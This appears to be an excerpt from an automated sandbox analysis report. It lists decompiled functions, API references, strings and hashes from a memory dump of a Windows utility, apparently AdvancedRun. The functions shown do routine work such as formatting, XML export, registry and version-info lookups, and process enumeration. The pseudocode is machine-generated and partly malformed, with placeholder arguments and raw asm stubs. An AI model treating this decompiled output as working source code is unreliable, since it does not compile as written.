Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00404fe0
0x00404fe9
0x00405000
0x00405005
0x00405009
0x0040500c
0x0040500e
0x00405015
0x00405016
0x00405021
0x00405026
0x00405027
0x0040502c
0x00405031
0x00405039
0x0040503f
0x00405044
0x00405048
0x0040504e
0x00405056
0x0040505c
0x0040504e
0x00405065
0x0040506a
0x00405072
0x00405079

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

0x00407d9c
0x00407d9e
0x00407da5
0x00407db3
0x00407dba
0x00407dc5
0x00407dc7
0x00407dd0
0x00407dc9
0x00407dc9
0x00407dc9
0x00407dd8
0x00407de1
0x00407de5
0x00407deb
0x00407df2
0x00407df3
0x00407dfe
0x00407e03
0x00407e04
0x00407e21

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<%s>, xrefs: 00407DF3
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

Advanced Run, xrefs: 00403BBE
exefile, xrefs: 00403BAD
"%s" /EXEFilename "%%1", xrefs: 00403B8E

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

general, xrefs: 00405ECB
dialog_%d, xrefs: 00405EA6
menu_%d, xrefs: 00405E96
strings, xrefs: 00405EC0

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409433
0x00409433
0x00409439
0x0040943f
0x00409445
0x0040944b
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x004094f7
0x004094f9
0x00000000
0x00000000
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094dc
0x004094e1
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409316
0x00409316
0x0040931c
0x00000000
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040931c
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

0x004079a4
0x004079b8
0x004079bd
0x004079c2
0x004079c5
0x004079c5
0x004079db
0x004079f7
0x00407a06
0x00407a0c
0x00407a11
0x00407a13
0x00407a14
0x00407a17
0x00407a18
0x00407a1d
0x00407a22
0x00407a25
0x00407a2a
0x00407a35
0x00407a3a
0x00407a3b
0x00407a40
0x00407a52

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

</item>, xrefs: 00407A41
<%s>%s</%s>, xrefs: 00407A18
<item>, xrefs: 004079AE

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x00409d5f
0x00409d67
0x00409d70
0x00409ddb
0x00409d72
0x00409d74
0x00409db2
0x00409d84
0x00409d84
0x00409d8c
0x00409d8d
0x00409d98
0x00409d9d
0x00409d9e
0x00409da6
0x00409daf
0x00409daf
0x00409dc3
0x00409dc3

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error %d: %s, xrefs: 00404802
Error, xrefs: 0040481D

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

